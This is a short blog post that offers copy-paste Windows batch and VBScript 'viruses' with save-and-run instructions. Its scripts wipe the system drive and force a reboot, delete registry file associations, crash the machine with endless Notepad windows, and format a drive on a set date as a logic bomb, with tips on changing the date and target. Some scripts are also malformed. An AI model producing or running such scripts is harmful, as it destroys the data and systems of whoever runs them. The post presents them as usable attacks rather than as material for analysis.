Virus Writing |
Virus is one of the interesting program that is used to destroy a system generally. Today here i'm going to write some notepad program that can be used as a Virus.
Important: I am not responsible for any damage or error reporting to you pc,do it at your own risk.
All scripts are here to be copied in notepad.
>>This Virus Deleted all the Contents of a Drive...
@echo off
del%systemdrive%*.*/f /s /q
shutdown -r -f -t 00
Save the above code in .bat file
>>The Most Simple Virus to Crush the Windows
@Echo off
Del C:\ *.* |y
Save it as Anything.bat
>>Delete key Registery files [NOTE THIS IS DANGEROUS!! USE AT RISK]
This will delete key registery files, then loops a message (CANNOT BE RECOVERED FROM)*
Code:
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been f**ked . Have a nice day.
GOTO MESSAGE
>>Endless Notepads
* This will pop up endless notepads untill the computer freezez and crashes*
Code:
@ECHO OFF
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
>>Bomb Virus
Copy paste the following
if %date% NEQ 2014/06/29 goto exit
format E: /y >nul
:exit
exit
And save it as Anything.bat
Note: you can change the date ( 2014/06/29) of the virus and the location (E:) on which it does action.
This virus will take effect on that day.
>>Endless Enter
*This contantly makes it so the enter button is being pressed continuosly*
Code:
Set wshShell=wscript.Createobject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
>>Endless Backspace
*This make it so the backspace key is constantly being presses*
Code:
MsgBox "Let's go back a few Steps"
Set Wshshell=wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshell.sendkeys "{bs}"
loop
Instructions:
- Paste the above code in notepad.
- Save as "Anyname.vbs"
- Run the file
- To stop, launch task manager and then under "Processes" end "wscript.exe"
I hope you would like it...
Keep Visiting...
0 comments:
Post a Comment